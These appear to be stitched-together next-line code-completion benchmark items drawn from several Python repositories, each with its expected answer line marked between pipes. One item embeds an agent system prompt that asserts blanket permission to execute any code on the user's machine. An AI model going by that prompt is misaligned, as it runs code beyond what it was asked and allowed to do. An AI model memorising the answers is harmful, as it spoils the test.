"error": "\x1b[31;1m❌ ERROR: ",
"normal": "\x1b[33;0m"
}
print(types.get(type, types["normal"]) + text + "\x1b[0m")
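A short usage sketch of the color-coded logger (messages are illustrative):

log("loading config", type="quiet")
log("model missing", type="warn")  # printed with the "⚠️ WARN: " prefix
log("plain message")               # unknown or absent types fall back to normal styling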
# Path: utils.py
def basepath():
match platform:
case "windows":
return (os.path.abspath(__file__).rsplit('\\', 1)[0] + "\\").replace("\\", "/")
case _:
return os.path.dirname(os.path.abspath(__file__).rsplit('\\', 1)[0] + "\\").replace("\\", "/")
# Path: utils.py
def tokenize(text):
tokens = tokenizer.tokenize(text)
return len(tokens)
# Path: main.py
import requests
import json
import jstyleson
import os
import time
import random
import generate
import history
from utils import log, basepath, tokenize
# Constants
config = jstyleson.loads(open(basepath() + "/config.json", "r").read())
# Initialize self
self_name = config["personality"]["name"]
self_persona = config["personality"]["persona"]
self_instruct_pre = config["personality"]["pre"]
self_instruct_post = config["personality"]["post"]
use_chat_completions = config["settings"]["use_chat_completions"]
force_pre = config["settings"]["force_pre"]
# Have self reply to the current situation.
def answer():
# What is the current situation?
prompt = buildPrompt()
def buildPrompt():
# Build the prompt frontmatter.
if use_chat_completions == True or force_pre == True:
frontmatter = self_instruct_pre + self_persona + self_instruct_post
else: # When using TextCompletions, we do not need to instruct the model, the response prompt does it for us.
frontmatter = self_persona + self_instruct_post
frontmatter_length = tokenize(frontmatter)
# What is our budget for message history?
history_token_budget = config["settings"]["context_size"] - config["settings"]["max_new_tokens"] - frontmatter_length
# Let's query messages until we hit the token limit.
message_event_stack = []
# TODO: implement checking max_history_items
event_stack = history.fetchEvents(6)
token_length = 0
for event in event_stack:
if event["event_type"] == "message":
token_length += tokenize(event["content"])
if token_length > history_token_budget:
break
message_event_stack.append(event)
# Build the message stack as a string.
message_stack = ""
for message in message_event_stack:
message_stack += (message["name"] + ": " + message["content"] + "\n")
# Build response prompt (unused in ChatCompletions).
response_prompt = self_name + ": "
prompt = frontmatter + message_stack
if use_chat_completions == False:
prompt += response_prompt
| log(prompt) |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: gunyu1019/async-client-decorator
# Path: async_client_decorator/request.py
def request(
method: str,
path: str,
directly_response: bool = False,
header_parameter: list[str] = None,
query_parameter: list[str] = None,
form_parameter: list[str] = None,
path_parameter: list[str] = None,
body_parameter: Optional[str] = None,
response_parameter: list[str] = None,
**request_kwargs
):
"""A decoration for making request.
Create a HTTP client-request, when decorated function is called.
Parameters
----------
method: str
HTTP method (example. GET, POST)
path: str
Request path. Path connects to the base url.
directly_response: bool
Returns an `aiohttp.ClientResponse` without executing the function's body statement.
header_parameter: list[str]
Function parameter names used in the header
query_parameter: list[str]
Function parameter names used in the query(parameter)
form_parameter: list[str]
Function parameter names used in body form.
path_parameter: list[str]
Function parameter names used in the path.
body_parameter: str
Function parameter name used in the body.
The body parameter must take only dict, list, or aiohttp.FormData.
response_parameter: list[str]
Function parameter name to store the HTTP result in.
**request_kwargs
Warnings
--------
Form_parameter and Body Parameter can only be used with one or the other.
"""
return _request(
lambda self, _path, **kwargs: self.request(method, _path, **kwargs),
path,
directly_response,
header_parameter,
query_parameter,
form_parameter,
path_parameter,
body_parameter,
response_parameter,
**request_kwargs
)
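A hedged sketch of applying this decorator, mirroring the `single_session` example that appears later in this repo (the endpoint and parameter name are taken from that example, not from this file):

@request("GET", "/bus/station", query_parameter=["name"])
async def station_query(session, name: str) -> aiohttp.ClientResponse:
    pass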
# Path: async_client_decorator/query.py
class Query:
"""This class is used when a function's parameters are used as query in an HTTP request.
Examples
--------
>>> def function(query: str | Query):
... pass
"""
DEFAULT_KEY = "__DEFAULT_QUERY__"
@staticmethod
def default_query(key: str, value: Any):
def decorator(func):
if not hasattr(func, Query.DEFAULT_KEY):
setattr(func, Query.DEFAULT_KEY, dict())
getattr(func, Query.DEFAULT_KEY)[key] = value
return func
return decorator
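A short sketch of attaching a default query value with this helper (the key/value pair and function are illustrative):

@Query.default_query("country", "KR")
async def station_query(session, name: str):
    pass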
# Path: async_client_decorator/session.py
class Session:
"""A class to manage session for managing decoration functions."""
def __init__(self, base_url: str, directly_response: bool = False, **kwargs):
self.directly_response = directly_response
self.base_url = base_url
self.session = aiohttp.ClientSession(self.base_url, **kwargs)
@property
def closed(self) -> bool:
return self.session.closed
async def close(self):
return await self.session.close()
async def request(self, method: str, path: str, **kwargs):
return await self.session.request(method, path, **kwargs)
async def get(self, path: str, **kwargs):
return await self.session.get(path, **kwargs)
async def post(self, path: str, **kwargs):
return await self.session.post(path, **kwargs)
async def options(self, path: str, **kwargs):
return await self.session.options(path, **kwargs)
async def delete(self, path: str, **kwargs):
return await self.session.delete(path, **kwargs)
@classmethod
def single_session(
cls, base_url: str, loop: asyncio.AbstractEventLoop = None, **session_kwargs
):
"""A single session for one request.
Parameters
----------
base_url: str
base url of the API. (for example, https://api.yhs.kr)
loop: asyncio.AbstractEventLoop
[event loop](https://docs.python.org/3/library/asyncio-eventloop.html#asyncio-event-loop) used for processing HTTP requests.
Examples
--------
The session is defined through the function's decoration.
>>> @Session.single_session("https://api.yhs.kr")
... @request("GET", "/bus/station")
... async def station_query(session: Session, name: Query | str) -> aiohttp.ClientResponse:
... pass
"""
def decorator(func: RequestFunction):
if not asyncio.iscoroutinefunction(func):
raise TypeError("function %s must be coroutine.".format(func.__name__))
@functools.wraps(func)
async def wrapper(*args, **kwargs):
client = cls(base_url, loop, **session_kwargs)
response = await func(client, *args, **kwargs)
if not client.closed:
await client.close()
return response
return wrapper
return decorator
# Path: example/single_session.py
import asyncio
import aiohttp
from typing import NamedTuple
from async_client_decorator import request, Session, Query
loop = asyncio.get_event_loop()
class StationInfo(NamedTuple):
displayId: str
id: str
name: str
posX: float
posY: float
stationId: str
type: int
| @Session.single_session("https://api.yhs.kr") |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: pmutua/CodeCraftGPT
# Path: data/programming_languages.py
PROGRAMMING_LANGUAGES = (
"Python", "JavaScript", "Java", "C++", "C#", "Ruby", "Swift", "Go", "PHP", "Rust", "VB.net",
"Kotlin", "TypeScript", "Scala", "Haskell", "Perl", "Objective-C", "Dart", "R", "Groovy",
"Elixir", "Lua", "Julia", "Shell", "HTML", "CSS", "SQL", "MATLAB", "CoffeeScript", "F#",
"Clojure", "Assembly", "Lisp", "Cobol", "Fortran", "Racket", "Ada", "Prolog"
)
# Path: prompts/translate_code_prompt.py
def create_translation_prompt(target_language, source_code):
"""
Create a chat prompt for a code translation task.
Parameters:
- target_language (str): The language to which the code should be translated.
- source_code (str): The source code that needs to be translated.
Returns:
langchain.chat_models.ChatPromptTemplate: The generated chat prompt template.
"""
system_template = "You are a code translator. Your task is to translate the given source code to {target_language}."
system_message_prompt = SystemMessagePromptTemplate.from_template(system_template)
human_template = "Please translate the following source code to {target_language}: '{source_code}'."
human_message_prompt = HumanMessagePromptTemplate.from_template(human_template)
chat_prompt = ChatPromptTemplate.from_messages([system_message_prompt, human_message_prompt])
return chat_prompt
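A minimal usage sketch, assuming a configured ChatOpenAI client; the target language and snippet are placeholder inputs, and chain.run supplies the template variables:

chat = ChatOpenAI(temperature=0)
prompt = create_translation_prompt("Rust", "print('hello')")
chain = LLMChain(llm=chat, prompt=prompt)
result = chain.run(target_language="Rust", source_code="print('hello')")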
# Path: components/lang_page.py
from typing import Type
from langchain.chains import LLMChain
from langchain.chat_models import ChatOpenAI
from data.programming_languages import PROGRAMMING_LANGUAGES
from prompts.translate_code_prompt import create_translation_prompt
import streamlit as st
"""
LangLink - Code Translation and Cross-Language Compatibility
Overcome language barriers with LangLink, an AI-powered tool facilitating smooth code translation
between programming languages. Developers can confidently migrate codebases, ensuring compatibility
and seamless transitions across different languages.
"""
def show_lang_page(chat: Type[ChatOpenAI]):
"""
Displays the LangLink page for code translation.
Parameters:
- chat (ChatOpenAI): The chat model used for translation.
Returns:
None
"""
st.title("LangLink - Code Translation and Cross-Language Compatibility")
st.markdown('Overcome language barriers with LangLink, an AI-powered tool facilitating smooth '
'code translation between programming languages. Developers can confidently migrate '
'codebases, ensuring compatibility and seamless transitions across different languages.')
with st.form(key="lang_form"):
source_code = st.text_area("Enter source code")
target_language = st.selectbox("Select programming language", PROGRAMMING_LANGUAGES)
submit_button = st.form_submit_button(label='Submit')
if submit_button:
st.text(f"Translating code snippet to {target_language}................✨")
| chat_prompt = create_translation_prompt(target_language,source_code) |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: itzshukla/STRANGER-USERBOT2.0
# Path: Zaid/database/pmpermitdb.py
async def get_approved_users():
results = await collection.find_one({"_id": "Approved"})
if results:
return results["users"]
else:
return []
# Path: Zaid/database/pmpermitdb.py
async def pm_guard():
result = await collection.find_one({"_id": 1})
if not result:
return False
if not result["pmpermit"]:
return False
else:
return True
# Path: config.py
LOG_GROUP = getenv("LOG_GROUP")
# Path: config.py
PM_LOGGER = getenv("PM_LOGGER")
# Path: Zaid/modules/private/pmguard.py
from pyrogram import filters, Client
from pyrogram.types import Message
from pyrogram.methods import messages
from Zaid.database.pmpermitdb import get_approved_users, pm_guard
from config import LOG_GROUP, PM_LOGGER
import asyncio
import Zaid.database.pmpermitdb as Zaid
FLOOD_CTRL = 0
ALLOWED = []
USERS_AND_WARNS = {}
async def denied_users(filter, client: Client, message: Message):
if not await pm_guard():
return False
if message.chat.id in (await get_approved_users()):
return False
else:
return True
def get_arg(message):
msg = message.text
msg = msg.replace(" ", "", 1) if msg[1] == " " else msg
split = msg[1:].replace("\n", " \n").split(" ")
if " ".join(split[1:]).strip() == "":
return ""
return " ".join(split[1:])
@Client.on_message(filters.command("setlimit", ["."]) & filters.me)
async def pmguard(client, message):
arg = get_arg(message)
if not arg:
await message.edit("**Set limit to what?**")
return
await Zaid.set_limit(int(arg))
await message.edit(f"**Limit set to {arg}**")
@Client.on_message(filters.command("setblockmsg", ["."]) & filters.me)
async def setpmmsg(client, message):
arg = get_arg(message)
if not arg:
await message.edit("**What message to set**")
return
if arg == "default":
await Zaid.set_block_message(Zaid.BLOCKED)
await message.edit("**Block message set to default**.")
return
await Zaid.set_block_message(f"`{arg}`")
await message.edit("**Custom block message set**")
@Client.on_message(filters.command(["allow", "ap", "approve", "a"], ["."]) & filters.me & filters.private)
async def allow(client, message):
chat_id = message.chat.id
pmpermit, pm_message, limit, block_message = await Zaid.get_pm_settings()
await Zaid.allow_user(chat_id)
await message.edit(f"**I have allowed [you](tg://user?id={chat_id}) to PM me.**")
async for message in client.search_messages(
chat_id=message.chat.id, query=pm_message, limit=1, from_user="me"
):
await message.delete()
USERS_AND_WARNS.update({chat_id: 0})
@Client.on_message(filters.command(["deny", "dap", "disapprove", "dapp"], ["."]) & filters.me & filters.private)
async def deny(client, message):
chat_id = message.chat.id
await Zaid.deny_user(chat_id)
await message.edit(f"**I have denied [you](tg://user?id={chat_id}) to PM me.**")
@Client.on_message(
filters.private
& filters.create(denied_users)
& filters.incoming
& ~filters.service
& ~filters.me
& ~filters.bot
)
async def reply_pm(app: Client, message):
global FLOOD_CTRL
pmpermit, pm_message, limit, block_message = await Zaid.get_pm_settings()
user = message.from_user.id
user_warns = 0 if user not in USERS_AND_WARNS else USERS_AND_WARNS[user]
| if PM_LOGGER: |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: UWNetworksLab/adn-compiler
# Path: compiler/element/logger.py
ELEMENT_LOG = logging.getLogger("ir")
# Path: compiler/element/node.py
class Expr(Node):
def __init__(self, lhs: Expr, op: Operator, rhs: Expr):
self.lhs = lhs
self.op = op
self.rhs = rhs
self.type = "unknown"
# Path: compiler/element/node.py
class Identifier(Node):
def __init__(self, name: str):
self.name = name
# Path: compiler/element/node.py
class Internal(Node):
def __init__(
self,
internal: List[
Tuple[
Identifier,
Type,
ConsistencyDecorator,
CombinerDecorator,
PersistenceDecorator,
]
],
):
self.internal = internal
# Path: compiler/element/node.py
class MethodCall(Expr):
def __init__(self, obj: Identifier, method: MethodType, args: List[Expr]):
self.obj = obj
self.method = method
self.args = args
# Path: compiler/element/node.py
class Procedure(Node):
def __init__(self, name: str, params: List[Identifier], body: List[Statement]):
self.name = name
self.params = params
self.body = body
# Path: compiler/element/visitor.py
class Visitor(ABC):
def visitNode(self, node: Node, ctx):
raise Exception(f"visit function for {node.__class__.__name__} not implemented")
def visitProgram(self, node: Program, ctx):
return self.visitNode(node)
def visitInternal(self, node: Internal, ctx):
return self.visitNode(node)
def visitProcedure(self, node: Procedure, ctx):
return self.visitNode(node)
def visitStatement(self, node: Statement, ctx):
return self.visitNode(node)
def visitMatch(self, node: Match, ctx):
return self.visitNode(node)
def visitAssign(self, node: Assign, ctx):
return self.visitNode(node)
def visitPattern(self, node: Pattern, ctx):
return self.visitNode(node)
def visitExpr(self, node: Expr, ctx):
return self.visitNode(node)
def visitIdentifier(self, node: Identifier, ctx):
return self.visitNode(node)
def visitFuncCall(self, node: FuncCall, ctx):
return self.visitNode(node)
def visitMethodCall(self, node: MethodCall, ctx):
return self.visitNode(node)
def visitSend(self, node: Send, ctx):
return self.visitNode(node)
def visitLiteral(self, node: Literal, ctx):
return self.visitNode(node)
# Path: compiler/element/optimize/consolidate.py
from copy import deepcopy
from typing import Callable, Dict, List, Optional, Protocol, Sequence, Tuple, TypeVar
from compiler.element.logger import ELEMENT_LOG as LOG
from compiler.element.node import *
from compiler.element.node import Expr, Identifier, Internal, MethodCall, Procedure
from compiler.element.visitor import Visitor
def consolidate(irs: List[Program]) -> Program:
while len(irs) > 1:
left = irs.pop(0)
right = irs.pop(0)
new_prog = Program(
Internal([]),
Procedure("init", [], []),
Procedure("req", [], []),
Procedure("resp", [], []),
)
new_prog.definition.internal = deepcopy(
left.definition.internal + right.definition.internal
)
InitConsolidator().visitProcedure(new_prog.init, (left.init, right.init))
ProcedureConsolidator().visitProcedure(
new_prog.req, (deepcopy(left.req), deepcopy(right.req))
)
ProcedureConsolidator().visitProcedure(
new_prog.resp, (deepcopy(right.resp), deepcopy(left.resp))
)
irs.append(new_prog)
return irs[0]
class InitConsolidator(Visitor):
def __init__(self):
pass
def visitNode(self, node: Node, ctx) -> str:
| LOG.error("InitConsolidator: visitNode not implemented") |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: sunholo-data/sunholo-py
# Path: sunholo/logging.py
def setup_logging(self, log_level=logging.INFO, logger_name=None):
if log_level:
self.log_level = log_level
if logger_name:
self.logger_name = logger_name
try:
caller_info = self._get_caller_info()
if not is_running_on_gcp():
logging.basicConfig(level=self.log_level, format='%(asctime)s - %(levelname)s - %(message)s')
logging.info(f"Standard logging: {caller_info['file']}")
return logging
print(f"Cloud logging for {caller_info['file']}")
self.client.setup_logging(log_level=self.log_level)
return self # Return the instance itself on success
except Exception as e:
# If there's an exception, use standard Python logging as a fallback
logging.basicConfig(level=self.log_level, format='%(asctime)s - %(levelname)s - %(message)s')
logging.warning(f"Failed to set up Google Cloud Logging. Using standard logging. Error: {e}")
return logging
# Path: sunholo/utils/config.py
def load_config_key(key: str, vector_name: str, filename: str=None) -> str:
from ..logging import setup_logging
logging = setup_logging()
assert isinstance(key, str), f"key must be a string got a {type(key)}"
assert isinstance(vector_name, str), f"vector_name must be a string, got a {type(vector_name)}"
config, filename = load_config(filename)
logging.info(f"Fetching {key} for {vector_name}")
llm_config = config.get(vector_name, None)
if llm_config is None:
raise ValueError(f"No config array was found for {vector_name} in {filename}")
logging.info(f'llm_config: {llm_config} for {vector_name} - fetching "{key}"')
key_value = llm_config.get(key, None)
return key_value
# Path: sunholo/utils/config.py
def load_config(filename: str=None) -> (dict, str):
from ..logging import setup_logging
logging = setup_logging()
if filename is None:
filename = os.getenv("_CONFIG_FILE", None)
if filename is None:
raise ValueError("No _CONFIG_FILE env value specified")
# Join the script directory with the filename
config_path = filename
logging.info(f"Loading config file {os.getcwd()}/{config_path}")
with open(config_path, 'r') as f:
if filename.endswith(".json"):
config = json.load(f)
elif filename.endswith(".yaml") or filename.endswith(".yml"):
config = yaml.safe_load(f)
else:
raise ValueError(f"Unsupported config file format: {config_path}. The supported formats are JSON and YAML.")
return config, filename
# Path: sunholo/utils/config.py
def get_module_filepath(filepath):
from ..logging import setup_logging
logging = setup_logging()
# Get the root directory of this Python script
dir_path = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
# Build the full filepath by joining the directory with the filename
filepath = os.path.join(dir_path, filepath)
logging.info(f"Found filepath {filepath}")
return filepath
# Path: sunholo/components/llm.py
from ..logging import setup_logging
from ..utils.config import load_config_key, load_config, get_module_filepath
from langchain.chat_models import ChatOpenAI
from langchain.llms import VertexAI
from langchain.llms import VertexAI
from ..patches.langchain.vertexai import VertexAIModelGarden
from langchain.chat_models import ChatOpenAI
from langchain.chat_models import ChatVertexAI
from langchain.chat_models import ChatVertexAI
from langchain_google_genai import ChatGoogleGenerativeAI
from langchain.embeddings import OpenAIEmbeddings
from langchain.embeddings import VertexAIEmbeddings
from langchain_google_genai import GoogleGenerativeAIEmbeddings
# Copyright [2023] [Holosun ApS]
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
logging = setup_logging()
def pick_llm(vector_name):
logging.debug('Picking llm')
| llm_str = load_config_key("llm", vector_name, filename = "config/llm_config.yaml") |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: atlantic-quantum/Shipyard
# Path: shipyard/passes/semantic_analysis/scoped_symbol_table.py
class ScopedSymbolTable:
class CalScopedSymbolTable(ScopedSymbolTable):
def __init__(
self,
scope_name: str,
enclosing_scope: "ScopedSymbolTable" = None,
) -> None:
def _init_builtins(self):
def __str__(self) -> str:
def insert(self, symbol: Symbol):
def lookup(self, name: str, current_scope_only: bool = False) -> Symbol:
def keys(self, current_scope_only=False) -> list[str]:
def __init__(
self,
scope_name: str,
enclosing_scope: "ScopedSymbolTable" = None,
init_cal: bool = False,
) -> None:
def _init_cal_builtins(self):
# Path: shipyard/passes/semantic_analysis/symbols.py
_BUILTIN_CLASSICAL_SYMBOL_NAMES = [
"ANGLE",
"BIT",
"BITSTRING",
"BOOL",
"COMPLEX",
"DURATION",
"FLOAT",
"IMAGINARY",
"INT",
"STRETCH",
"UINT",
"PORT",
"FRAME",
"WAVEFORM",
"ARRAY",
]
_BUILTIN_QUANTUM_SYMBOL_NAMES = ["QUBIT"]
BUILTIN_TYPES = [
angle_type,
array_type,
bit_type,
bitstring_type,
bool_type,
complex_type,
duration_type,
float_type,
imaginary_type,
int_type,
qubit_type,
stretch_type,
uint_type,
]
BUILTIN_CAL_TYPES = [
frame_type,
port_type,
waveform_type,
]
_ALLOWED_ARRAY_TYPES = [
"ANGLE",
"BIT",
"BOOL",
"COMPLEX",
"FLOAT",
"INT",
"UINT",
]
class Symbol(BaseModel):
class BuiltinSymbol(Symbol):
class BuiltinCalSymbol(Symbol):
class ArraySymbol(Symbol):
class AliasSymbol(Symbol):
class ClassicalSymbol(Symbol):
class LiteralSymbol(ClassicalSymbol):
class ConstantSymbol(Symbol):
class IOSymbol(Symbol):
class QuantumSymbol(Symbol):
class GrammarSymbol(Symbol):
class SubroutineSymbol(Symbol):
class ExternSymbol(SubroutineSymbol):
class GateSymbol(SubroutineSymbol):
class DefcalSymbol(GateSymbol):
def force_kind_uppercase(cls, kind: str) -> str:
def kind_of_builtin_is_none(kind: str) -> str:
def kind_is_array(cls, kind: str) -> str:
def array_base_type_must_be_of_allowed_type(cls, base_type: str) -> str:
def kind_must_be_name_of_classical_type(kind: str) -> str:
def kind_must_be_name_of_quantum_type(cls, kind: str) -> str:
def return_classical_or_none(cls, return_type: str):
# Path: tests/passes/semantic_analysis/test_scoped_symbol_table.py
import pytest
from shipyard.passes.semantic_analysis import scoped_symbol_table as sst
from shipyard.passes.semantic_analysis import symbols
"""
The scoped symbol table is intended to be used by the Semantic Analyser module.
An 'end-to-end' use case example will be included in the tests for the Semantic Analyser
ToDo update working when adding semantic analyser tests
"""
SYMBOL_LISTS = [sst.BUILTIN_TYPES, sst.BUILTIN_ZI_EXP]
CAL_SYMBOL_LISTS = [sst.BUILTIN_CAL_TYPES, sst.BUILTIN_OPENPULSE, sst.BUILTIN_ZI_WFM]
@pytest.fixture(name="main_table")
def fixture_main_table() -> sst.ScopedSymbolTable:
"""Fixture for creating the 'main' ScopedSymbolTable
this table has no enclosing scope
Returns:
sst.ScopedSymbolTable: symbol table with no enclosing scope
"""
return sst.ScopedSymbolTable("main")
@pytest.fixture(name="nested_table")
def fixture_nested_table(main_table: sst.ScopedSymbolTable) -> sst.ScopedSymbolTable:
"""Fixture for creating a nested ScopedSymbolTable
the 'main' symbol table encloses this table
Args:
main_table (sst.ScopedSymbolTable): used as enclosing scope for this table
Returns:
sst.ScopedSymbolTable: symbol table with enclosing scope
"""
return sst.ScopedSymbolTable("nested", enclosing_scope=main_table)
@pytest.fixture(name="cal_table")
def fixture_cal_table(main_table: sst.ScopedSymbolTable) -> sst.CalScopedSymbolTable:
"""
Fixture for creating 'main' a ScopedSymbolTable for openPulse code,
has the 'main' symbol table as an enclosing scope and is initialised with
init_cal set to True
Args:
main_table (sst.ScopedSymbolTable): used as enclosing scope for this table
Returns:
sst.CalScopedSymbolTable: main calibration symbol table
"""
return sst.CalScopedSymbolTable("cal", enclosing_scope=main_table, init_cal=True)
@pytest.fixture(name="defcal_table")
def fixture_defcal_table(
cal_table: sst.CalScopedSymbolTable,
) -> sst.CalScopedSymbolTable:
"""
Fixture for creating a nested ScopedSymbolTable for openPulse code,
has the 'main calibration' (cal_table) as an enclosing scope
Args:
cal_table (sst.CalScopedSymbolTable): used as enclosing scope for this table
Returns:
sst.CalScopedSymbolTable: nested calibration symbol table
"""
return sst.CalScopedSymbolTable("defcal", enclosing_scope=cal_table)
def test_scoped_symbol_table_basic(main_table: sst.ScopedSymbolTable):
"""Test basic insertion and lookup in table without enclosing scope"""
# test that built in symbols have been inserted
for symbol_list in SYMBOL_LISTS:
symbol_names = []
for symbol in symbol_list:
assert main_table.lookup(symbol.name) is symbol
symbol_names.append(symbol.name)
# test that names of builtin symbols are returned by the keys method
for name in symbol_names:
assert name in main_table.keys()
assert name in main_table.keys(current_scope_only=True)
# test inserting a symbol, looking it up, and its name being returned by keys()
| c_symbol = symbols.ClassicalSymbol(name="test", kind=symbols.angle_type.name) |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: PrAsAnNaRePo/LocalAgent
# Path: localagent/utils.py
def get_prompt_from_template(system, history, human_, assistant_, eos_token):
for i in history:
if i['role'] == 'user':
system += f'{human_}{i["content"]}{eos_token}'
if i['role'] == 'assistant':
system += f'{assistant_}{i["content"]}{eos_token}'
if history[-1]['role'] == 'user':
system += f'{assistant_}'
return system
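An illustrative call with hypothetical ChatML-style role markers:

prompt = get_prompt_from_template(
    system="You are helpful.\n",
    history=[{"role": "user", "content": "hi"}],
    human_="<|user|>",
    assistant_="<|assistant|>",
    eos_token="<|end|>",
)
# -> "You are helpful.\n<|user|>hi<|end|><|assistant|>"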
# Path: localagent/utils.py
def internal_monologue(msg):
# ANSI escape code for italic is '\x1B[3m'
print(f"\x1B[3m{Fore.LIGHTBLACK_EX}💭 {msg}{Style.RESET_ALL}")
# Path: localagent/gen.py
def run(uri, prompt, force_model=False):
if force_model:
prompt += "\nThought:"
request = {
'prompt': prompt,
'max_new_tokens': 500,
'auto_max_new_tokens': False,
'max_tokens_second': 0,
'do_sample': True,
'temperature': 0.1,
'repetition_penalty': 1.24,
'skip_special_tokens': True,
'stopping_strings': ['<|end_of_turn|>', '<|im_end|>', 'Observation']
}
response = requests.post(uri, json=request)
if response.status_code == 200:
result = response.json()['results'][0]['text']
return '\nThought:'+result if force_model else result
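A hedged call sketch; the URI points at a local text-generation-webui style endpoint and is an assumption, not part of this file:

text = run("http://127.0.0.1:5000/api/v1/generate", "Hello, world", force_model=True)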
# Path: localagent/gen.py
def stream_run(uri, prompt, force_model=False):
return asyncio.run(print_response_stream(uri, prompt, force_model))
# Path: localagent/gen.py
def ollama_generate(model_name, prompt=None, system=None, template=None, stream=False, format="", context=None, options=None, callback=None, force_model=False):
try:
if template is not None and force_model:
template += '\nThought:'
url = f"{BASE_URL}/api/generate"
payload = {
"model": model_name,
"prompt": prompt,
"system": system,
"template": template,
"context": context,
"options": options,
"format": format,
}
# Remove keys with None values
payload = {k: v for k, v in payload.items() if v is not None}
with requests.post(url, json=payload, stream=True) as response:
response.raise_for_status()
# Creating a variable to hold the context history of the final chunk
final_context = None
# Variable to hold concatenated response strings if no callback is provided
full_response = ""
# Iterating over the response line by line and displaying the details
for line in response.iter_lines():
if line:
# Parsing each line (JSON chunk) and extracting the details
chunk = json.loads(line)
# If a callback function is provided, call it with the chunk
if callback:
callback(chunk)
else:
# If this is not the last chunk, add the "response" field value to full_response and print it
if not chunk.get("done"):
response_piece = chunk.get("response", "")
full_response += response_piece
if 'Observation' in full_response:
break
if stream:
print(response_piece, end="", flush=True)
# Check if it's the last chunk (done is true)
if chunk.get("done"):
final_context = chunk.get("context")
full_response = full_response.replace('Observation', '')
# Return the full response and the final context
return '\nThought:'+full_response if force_model else full_response, final_context
except requests.exceptions.RequestException as e:
print(f"An error occurred: {e}")
return None, None
# Path: localagent/interpreter.py
import subprocess
import sys
from localagent.utils import get_prompt_from_template, internal_monologue
from localagent.gen import run, stream_run, ollama_generate
from rich.console import Console
console = Console()
CODE_INTERPRETER = """You are Open Interpreter, a world-class programmer that can complete any goal by executing code.
First, write a plan. **Always recap the plan between each code block**.
When you execute code, it will be executed **on the user's machine**. The user has given you **full and complete permission** to execute any code necessary to complete the task.
If you want to send data between programming languages, save the data to a txt or json.
You can access the internet. Run **any code** to achieve the goal, and if at first you don't succeed, try again and again.
You can install new packages.
When a user refers to a filename, they're likely referring to an existing file in the directory you're currently executing code in.
Write messages to the user in Markdown.
In general, try to **make plans** with as few steps as possible. Remember that each code block is executed as a single file, so you can't access variables from the first code block in the second one.
You are capable of **any** task. Don't install libraries using '!' in the python code block; instead, use a separate bash code block.
As an open interpreter you should respond with code more than text. Always try to print things out so you can learn their values from the output.
"""
def extract_code(string):
code_blocks = []
parts = string.split("```")
for i in range(1, len(parts), 2):
lines = parts[i].split("\n")
lang = lines[0]
code = "\n".join(lines[1:])
code_blocks.append((lang, code))
return code_blocks
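For example, given one fenced block the function returns its language tag and body (note the trailing newline kept by the join):

blocks = extract_code("```python\nprint(1)\n```")
assert blocks == [("python", "print(1)\n")]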
class Interpreter:
def __init__(self, exec, max_try, human_, assistant_, eos_token, stream=False) -> None:
self.history = []
self.exec = exec
self.max_try = max_try
self.human_ = human_
self.assistant_ = assistant_
self.eos_token = eos_token
self.stream = stream
def execute_code(self, lang, code, timeout=10):
if lang.lower() == 'python':
try:
output = subprocess.run([sys.executable, "-c", code], capture_output=True, text=True, timeout=timeout)
except subprocess.TimeoutExpired:
print(f"Execution of Python code timed out after {timeout} seconds.")
return None
elif lang.lower() == 'bash':
try:
output = subprocess.run(code, shell=True, capture_output=True, text=True, timeout=timeout)
except subprocess.TimeoutExpired:
print(f"Execution of Bash code timed out after {timeout} seconds.")
return None
else:
print('Only python and bash are supported.')
return None
return output
def __call__(self, task):
print('\n')
| internal_monologue("Interpreter is executing the code...\n") |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: Cymaphore/orfodon-service
# Path: config.py
# Path: feeds.py
# Path: hashtag_modification.py
# Path: hashtag_modification.py
# Path: hashtag_modification.py
# Path: hashtag_modification.py
# Path: hashtag_modification.py
# Path: orfodon_service.py
import re
import yaml
import copy
import feedparser
import time
import requests
import hashlib
from datetime import datetime
from bs4 import BeautifulSoup
from mastodon import Mastodon
from pprint import pprint
from config import config
from credentials import credentials
from feeds import feeds
from hashtag_modification import hashtag_replace
from hashtag_modification import hashtag_blacklist
from hashtag_modification import category_aliases
from hashtag_modification import oewa_sport_aliases
from hashtag_modification import oewa_bypass
hashtag_wordlist = []
#############################################################################
##
# Main function
# Call all the stages in correct order
def main():
# Load hashtag wordlists
load_hashtags()
# Load previous state, initialize new state
load_state()
# Load the configured feeds and preprocess text
load_feeds()
# Grab post references from other channels for boosting, keep id from oldState
grab_posts()
# Post newly generated articles to the channels
post_feeds()
# Save state for next cycle
save_state()
#############################################################################
##
# Load hashtag wordlists
def load_hashtags():
hashtags_filename = config["files"]["global_hashtags"]
if True:
hashtags_file = open(hashtags_filename, "r")
global hashtag_wordlist
